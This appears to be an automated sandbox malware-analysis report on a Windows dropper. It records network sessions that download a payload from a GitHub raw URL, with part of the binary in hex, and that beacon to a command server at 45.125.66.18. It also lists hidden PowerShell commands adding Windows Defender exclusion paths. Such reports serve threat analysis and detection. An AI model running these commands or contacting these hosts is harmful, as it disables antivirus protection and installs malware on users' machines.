                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549722185.199.111.133443320C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:52 UTC204OUTGET /workhasf/kelm/main/iconozave.exe HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe
                                                Accept-Encoding: gzip
                                                2024-08-27 10:55:52 UTC897INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 38912
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: application/octet-stream
                                                ETag: "12c37a0d92e3f8714d00d8ffa40d644b8e2520270caa1a870ac073d1e42f9dd0"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: 6C35:16B1:419376:488FF3:66CDB0A7
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 10:55:52 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740041-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1724756152.308295,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 4a522dcd289136a37b94e132cb999cdc5625b8ce
                                                Expires: Tue, 27 Aug 2024 11:00:52 GMT
                                                Source-Age: 17
                                                2024-08-27 10:55:52 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 8e cb ea b5 ef a5 b9 b5 ef a5 b9 b5 ef a5 b9 b3 6e a6 b8 b1 ef a5 b9 fe 97 a4 b8 b8 ef a5 b9 b5 ef a4 b9 a0 ef a5 b9 da 6e a1 b8 a9 ef a5 b9 da 6e a7 b8 b4 ef a5 b9 52 69 63 68 b5 ef a5 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 53 cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 26 00 84 00 00 00 14 00 00 00 00 00 00 30 1d 00 00 00 10 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$nnnRichPELPSf&0
                                                2024-08-27 10:55:52 UTC1378INData Raw: 52 e8 88 7f 00 00 83 c4 08 89 45 ec 8b 45 f8 8b 48 08 ba 04 00 00 00 6b c2 00 81 bc 01 1a 04 00 00 4c 11 d2 ca 75 27 6a 00 8b 4d f8 8b 51 08 52 8b 45 08 50 8b 4d f8 83 c1 04 51 8b 55 f8 8b 02 50 e8 28 25 00 00 83 c4 14 e9 29 01 00 00 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 81 fa 80 00 00 00 0f 83 0a 01 00 00 8b 45 f8 8b 48 08 0f b6 55 ff 83 bc 91 1a 04 00 00 00 75 02 eb d1 8b 45 f8 8b 48 08 0f b6 55 ff 0f b6 84 11 1a 07 00 00 83 f8 01 75 3c 83 7d f0 00 75 36 8b 4d 0c 83 c1 2c 51 e8 a2 7e 00 00 83 c4 04 89 45 f4 83 7d f4 00 74 1e 8b 55 f4 52 e8 2d 10 00 00 83 c4 04 d1 e0 50 8b 45 f4 50 e8 be 7e 00 00 83 c4 08 89 45 f0 83 7d f0 00 74 16 8b 4d f8 8b 51 08 0f b6 45 ff 8b 8c 82 1a 04 00 00 3b 4d f0 74 2c 8b 55 f8 8b 42 08 0f b6 4d ff 0f b6 94
                                                Data Ascii: REEHkLu'jMQREPMQUP(%)EMMUEHUuEHUu<}u6M,Q~E}tUR-PEP~E}tMQE;Mt,UBM
                                                2024-08-27 10:55:52 UTC1378INData Raw: 0c 00 00 83 c4 08 85 c0 74 07 b8 01 00 00 00 eb 02 33 c0 8b e5 5d c3 cc cc cc cc cc 55 8b ec 83 ec 14 e8 55 05 00 00 e8 50 03 00 00 85 c0 75 07 33 c0 e9 ce 00 00 00 68 8d bd c1 3f a1 78 b0 40 00 50 e8 d5 00 00 00 83 c4 08 a3 94 b0 40 00 83 3d 94 b0 40 00 00 75 07 33 c0 e9 a6 00 00 00 c7 45 f0 90 b0 40 00 8b 4d f0 89 4d f8 c7 45 ec 78 b0 40 00 8b 55 ec 89 55 f4 8b 45 f4 83 e8 04 89 45 f4 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 83 fa 27 73 66 8b 45 f8 83 38 00 75 16 8b 4d f4 83 c1 04 89 4d f4 8b 55 f8 83 c2 04 89 55 f8 eb d2 eb 18 8b 45 f8 8b 08 3b 0d 94 b0 40 00 75 0b 8b 55 f8 83 c2 04 89 55 f8 eb b8 8b 45 f8 8b 08 51 8b 55 f4 8b 02 50 e8 3b 00 00 00 83 c4 08 8b 4d f8 89 01 8b 55 f8 83 3a 00 75 04 33 c0 eb 10 8b 45 f8 83 c0 04 89 45 f8 eb
                                                Data Ascii: t3]UUPu3h?x@P@=@u3E@MMEx@UUEEEMMU'sfE8uMMUUE;@uUUEQUP;MU:u3EE
                                                2024-08-27 10:55:52 UTC1378INData Raw: 8c b0 40 00 83 ae 0c 5f 75 06 33 c0 eb 07 eb 05 b8 01 00 00 00 8b e5 5d c3 cc 55 8b ec 33 c0 74 2b 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 00 a0 40 00 6a 00 6a 00 6a 00 6a 00 6a 00 e8 12 77 00 00 6a 00 6a 00 ff 15 64 a0 40 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 e8 54 0d 00 00 83 c4 04 e8 4c 22 00 00 e8 e7 01 00 00 e8 32 fb ff ff 5d c3 55 8b ec e8 38 fa ff ff 85 c0 74 22 e8 9f 01 00 00 85 c0 74 19 e8 96 20 00 00 85 c0 74 10 8b 45 08 50 e8 49 0b 00 00 83 c4 04 85 c0 75 08 6a 00 ff 15 14 a0 40 00 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 c7 45 f8 00 00 00 00 33 c0 66 89 45 fc eb 0c 66 8b 4d fc 66 83 c1 01 66 89 4d fc 0f b7 55 fc 81 fa e8 03 00 00 73 19 0f b7 45 fc 8b 4d 08 83 7c 81 10 00 74 09 c7 45 f8 01 00 00 00 eb 02 eb
                                                Data Ascii: @_u3]U3t+jjjjjj@jjjjjwjjd@]UEPTL"2]U8t"t tEPIuj@]UE3fEfMffMUsEM|tE
                                                2024-08-27 10:55:52 UTC1378INData Raw: 8b 4d 08 0f b7 11 83 fa 5a 7f 0f 8b 45 08 0f b7 08 83 c1 20 8b 55 08 66 89 0a 8b 45 08 83 c0 02 89 45 08 eb c6 5d c3 cc 55 8b ec 83 ec 0c 8b 45 08 89 45 fc 8b 4d 0c 89 4d f8 8b 55 fc 8b 45 f8 66 8b 08 66 89 0a 8b 55 fc 0f b7 02 89 45 f4 8b 4d fc 83 c1 02 89 4d fc 8b 55 f8 83 c2 02 89 55 f8 83 7d f4 00 74 02 eb d1 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 08 50 e8 41 00 00 00 83 c4 04 83 c0 01 89 45 f8 8b 4d f8 d1 e1 51 e8 7d fc ff ff 83 c4 04 89 45 fc 83 7d fc 00 74 16 8b 55 f8 d1 e2 52 8b 45 08 50 8b 4d fc 51 e8 ce fc ff ff 83 c4 0c 8b 45 fc 8b e5 5d c3 cc cc cc cc 55 8b ec 51 8b 45 08 89 45 fc 8b 4d fc 0f b7 11 85 d2 74 0b 8b 45 fc 83 c0 02 89 45 fc eb eb 8b 45 fc 2b 45 08 d1 f8 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 8b 45 08
                                                Data Ascii: MZE UfEE]UEEMMUEffUEMMUU}tE]UEPAEMQ}E}tUREPMQE]UQEEMtEEE+E]UQE
                                                2024-08-27 10:55:52 UTC1378INData Raw: ff 83 c4 04 89 45 f0 68 16 04 00 00 6a 00 8b 4d f0 51 e8 1f f9 ff ff 83 c4 0c 68 16 04 00 00 8b 55 0c 03 55 f8 52 8b 45 f0 50 e8 57 f8 ff ff 83 c4 0c 8b 4d f0 51 8b 55 08 52 e8 c7 eb ff ff 83 c4 08 8b 45 f0 50 e8 ab f7 ff ff 83 c4 04 8b 4d f8 81 c1 16 04 00 00 89 4d f8 8b 55 08 8a 82 b8 0f 00 00 2c 01 8b 4d 08 88 81 b8 0f 00 00 e9 9e 00 00 00 0f b6 55 ff 0f b6 44 15 ac 83 f8 02 0f 85 8c 00 00 00 8b 4d 08 8a 91 b8 0f 00 00 80 c2 01 8b 45 08 88 90 b8 0f 00 00 68 0b 0b 00 00 e8 12 f7 ff ff 83 c4 04 89 45 ec 68 0b 0b 00 00 6a 00 8b 4d ec 51 e8 7c f8 ff ff 83 c4 0c 68 0b 0b 00 00 8b 55 0c 03 55 f8 52 8b 45 ec 50 e8 b4 f7 ff ff 83 c4 0c 8b 4d ec 51 8b 55 08 52 e8 34 e8 ff ff 83 c4 08 8b 45 ec 50 e8 08 f7 ff ff 83 c4 04 8b 4d f8 81 c1 0b 0b 00 00 89 4d f8 8b 55
                                                Data Ascii: EhjMQhUUREPWMQUREPMMU,MUDMEhEhjMQ|hUUREPMQUR4EPMMU
                                                2024-08-27 10:55:52 UTC1378INData Raw: 00 00 6a 00 8d 4d f0 51 8d 55 f8 52 6a 00 68 13 00 00 20 8b 45 08 50 ff 15 20 b1 40 00 85 c0 74 57 81 7d f8 94 01 00 00 74 12 81 7d f8 90 01 00 00 74 09 81 7d f8 f4 01 00 00 72 16 8b 4d fc 0f b6 51 08 83 fa 01 75 08 6a 00 ff 15 14 a0 40 00 eb 26 81 7d f8 c9 00 00 00 74 09 81 7d f8 c8 00 00 00 75 14 8b 45 fc 0f b6 48 08 83 f9 05 75 08 6a 00 ff 15 14 a0 40 00 6a 00 8b 55 08 52 ff 15 04 b1 40 00 e9 d1 00 00 00 81 7d 10 00 00 04 00 0f 85 94 00 00 00 8b 45 fc 8b 4d 14 8b 11 89 50 1c 8b 45 fc 8b 48 18 8b 55 fc 03 4a 1c 8b 45 fc 89 48 18 8b 4d fc 83 79 1c 00 75 21 8b 55 fc 83 7a 04 04 74 0a 8b 45 fc c7 40 04 03 00 00 00 8b 4d 0c 51 e8 bc f1 ff ff 83 c4 04 eb 4b 8b 55 fc 8b 42 18 50 8b 4d fc 8b 51 0c 52 e8 24 f3 ff ff 83 c4 08 8b 4d fc 89 41 0c 8b 55 fc 83 7a 0c
                                                Data Ascii: jMQURjh EP @tW}t}t}rMQuj@&}t}uEHuj@jUR@}EMPEHUJEHMyu!UztE@MQKUBPMQR$MAUz
                                                2024-08-27 10:55:52 UTC1378INData Raw: cc cc 55 8b ec 51 68 2d b0 40 00 8b 45 08 83 c0 20 50 e8 1b ef ff ff 83 c4 08 c7 45 fc 00 00 fe 7f 8b 4d 08 8b 55 fc 8b 82 60 02 00 00 89 81 15 08 00 00 8b 4d 08 8b 55 fc 8b 82 6c 02 00 00 89 81 0d 08 00 00 8b 4d 08 8b 55 fc 8b 82 70 02 00 00 89 81 11 08 00 00 68 06 b0 40 00 8b 4d 08 51 e8 cd ee ff ff 83 c4 08 68 52 b0 40 00 8b 55 08 83 c2 07 52 e8 b9 ee ff ff 83 c4 08 8b 45 08 50 e8 cd 5a 00 00 83 c4 04 8b 4d 08 51 e8 41 58 00 00 83 c4 04 8b 55 08 52 e8 b5 59 00 00 83 c4 04 6a 01 8b 45 08 50 e8 37 59 00 00 83 c4 08 8b 4d 08 51 e8 5b 5a 00 00 83 c4 04 8b 55 08 52 e8 2f 5a 00 00 83 c4 04 8b 45 08 50 e8 d3 59 00 00 83 c4 04 8b 4d 08 51 e8 e7 59 00 00 83 c4 04 8b 55 08 52 e8 8b 5a 00 00 83 c4 04 8b e5 5d c3 cc cc cc cc 55 8b ec 81 ec 38 0f 00 00 68 33 0f 00
                                                Data Ascii: UQh-@E PEMU`MUlMUph@MQhR@UREPZMQAXURYjEP7YMQ[ZUR/ZEPYMQYURZ]U8h3
                                                2024-08-27 10:55:52 UTC1378INData Raw: d7 f5 ff ff 02 8b 4d 14 8a 11 88 95 b0 f5 ff ff 68 21 06 00 00 6a 00 8d 85 d8 f9 ff ff 50 e8 ed e8 ff ff 83 c4 0c 8b 4d 10 51 8d 95 e8 fd ff ff 52 e8 6a ea ff ff 83 c4 08 8b 45 14 05 09 02 00 00 50 8d 8d d8 f9 ff ff 51 e8 52 ea ff ff 83 c4 08 68 08 02 00 00 8b 55 14 83 c2 01 52 8d 85 e0 fb ff ff 50 e8 97 e7 ff ff 83 c4 0c 0f b6 4d 18 51 8b 55 14 52 8d 85 d8 f9 ff ff 50 e8 2f 01 00 00 83 c4 0c 0f b6 c8 85 c9 75 05 e9 15 01 00 00 0f b6 55 18 8b 45 14 0f b6 8c 10 9a 06 00 00 83 f9 01 75 46 8b 55 0c 52 81 ec 28 04 00 00 b9 09 01 00 00 8d b5 b0 f5 ff ff 8b fc f3 a5 66 a5 a4 81 ec 24 06 00 00 b9 88 01 00 00 8d b5 d8 f9 ff ff 8b fc f3 a5 a4 8b 45 08 50 e8 b1 fc ff ff 81 c4 54 0a 00 00 e9 af 00 00 00 0f b6 4d 18 8b 55 14 0f b6 84 0a 9a 06 00 00 85 c0 0f 85 98 00
                                                Data Ascii: Mh!jPMQRjEPQRhURPMQURP/uUEuFUR(f$EPTMU
                                                2024-08-27 10:55:52 UTC1378INData Raw: 00 68 27 04 00 00 6a 00 8d 85 ac fb ff ff 50 e8 9a e3 ff ff 83 c4 0c 68 ff 00 00 00 8d 8d ac fb ff ff 51 e8 f6 4e 00 00 83 c4 08 ba 01 00 00 00 6b c2 00 c6 84 05 d3 fb ff ff 05 6a 26 6a 00 8d 4d d4 51 e8 66 e3 ff ff 83 c4 0c 8d 55 d4 52 e8 6a 00 00 00 83 c4 04 68 27 04 00 00 8d 85 ac fb ff ff 50 b9 01 00 00 00 6b d1 00 03 55 fc 52 e8 8a e2 ff ff 83 c4 0c 6a 26 8d 45 d4 50 b9 01 00 00 00 69 d1 27 04 00 00 03 55 fc 52 e8 6d e2 ff ff 83 c4 0c 6a 05 68 4d 04 00 00 8b 45 fc 50 8b 4d 08 51 e8 f6 ed ff ff 83 c4 10 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 c6 40 25 01 68 2d b0 40 00 8b 4d 08 51 e8 98 e3 ff ff 83 c4 08 5d c3 cc cc cc 55 8b ec 83 ec 0c e8 95 01 00 00 85 c0 74 09 83 3d e8 b0 40 00 00 75 0c e8 73 06 00 00 33 c0 e9 61
                                                Data Ascii: h'jPhQNkj&jMQfURjh'PkURj&EPi'URmjhMEPMQ]UE@%h-@MQ]Ut=@us3a


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.54972345.125.66.184436420C:\Reka\rapnewsa.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:55 UTC287OUTPOST /api/receiver/recv HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
                                                Content-Length: 3160
                                                Host: 45.125.66.18
                                                2024-08-27 10:55:55 UTC3160OUTData Raw: 00 7b 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
                                                2024-08-27 10:55:56 UTC238INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Tue, 27 Aug 2024 10:55:56 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Content-Length: 61
                                                Connection: close
                                                X-Powered-By: Express
                                                ETag: W/"3d-0INsEuNarmdMljuUeTQ2pFyS2b4"
                                                2024-08-27 10:55:56 UTC61INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 74 65 72 76 61 6c 22 2c 22 65 72 72 6f 72 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 22 2c 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 30 7d
                                                Data Ascii: {"message":"Interval","error":"Bad Request","statusCode":400}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.54972434.194.69.213443320C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:56:00 UTC95OUTGET /get HTTP/1.1
                                                Host: httpbin.org
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 10:56:00 UTC225INHTTP/1.1 200 OK
                                                Date: Tue, 27 Aug 2024 10:56:00 GMT
                                                Content-Type: application/json
                                                Content-Length: 238
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-08-27 10:56:00 UTC238INData Raw: 7b 0a 20 20 22 61 72 67 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 22 48 6f 73 74 22 3a 20 22 68 74 74 70 62 69 6e 2e 6f 72 67 22 2c 20 0a 20 20 20 20 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 22 2c 20 0a 20 20 20 20 22 58 2d 41 6d 7a 6e 2d 54 72 61 63 65 2d 49 64 22 3a 20 22 52 6f 6f 74 3d 31 2d 36 36 63 64 62 30 63 30 2d 35 36 35 61 36 32 64 64 37 35 63 63 64 31 62 33 35 62 32 30 63 30 34 61 22 0a 20 20 7d 2c 20 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 20 0a 20 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 62 69 6e 2e 6f 72 67 2f 67 65 74 22 0a 7d 0a
                                                Data Ascii: { "args": {}, "headers": { "Host": "httpbin.org", "User-Agent": "Go-http-client/1.1", "X-Amzn-Trace-Id": "Root=1-66cdb0c0-565a62dd75ccd1b35b20c04a" }, "origin": "8.46.123.33", "url": "https://httpbin.org/get"}


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:06:55:08
                                                Start date:27/08/2024
                                                Path:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\UBONg7lmVR.exe"
                                                Imagebase:0x750000
                                                File size:52'506'624 bytes
                                                MD5 hash:D2DB9A159617250A517F9D074AB8F947
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:3
                                                Start time:06:55:19
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe"
                                                Imagebase:0x870000
                                                File size:8'077'824 bytes
                                                MD5 hash:A499C507987982C951093E21DF0C0D96
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Go lang
                                                Antivirus matches:
                                                • Detection: 11%, ReversingLabs
                                                • Detection: 8%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:06:55:25
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:06:55:25
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:06:55:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:06:55:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:06:55:32
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:06:55:32
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:06:55:35
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:06:55:35
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:06:55:37
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:06:55:37
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:06:55:40
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:17
                                                Start time:06:55:40
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:06:55:42
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:06:55:42
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:06:55:51
                                                Start date:27/08/2024
                                                Path:C:\Reka\rapnewsa.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Reka\rapnewsa.exe
                                                Imagebase:0x230000
                                                File size:38'912 bytes
                                                MD5 hash:2D4E723C184D9403B078E53F2DE74A23
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 16%, ReversingLabs
                                                • Detection: 24%, Virustotal, Browse
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:4.2%
                                                  Total number of Nodes:884
                                                  Total number of Limit Nodes:70
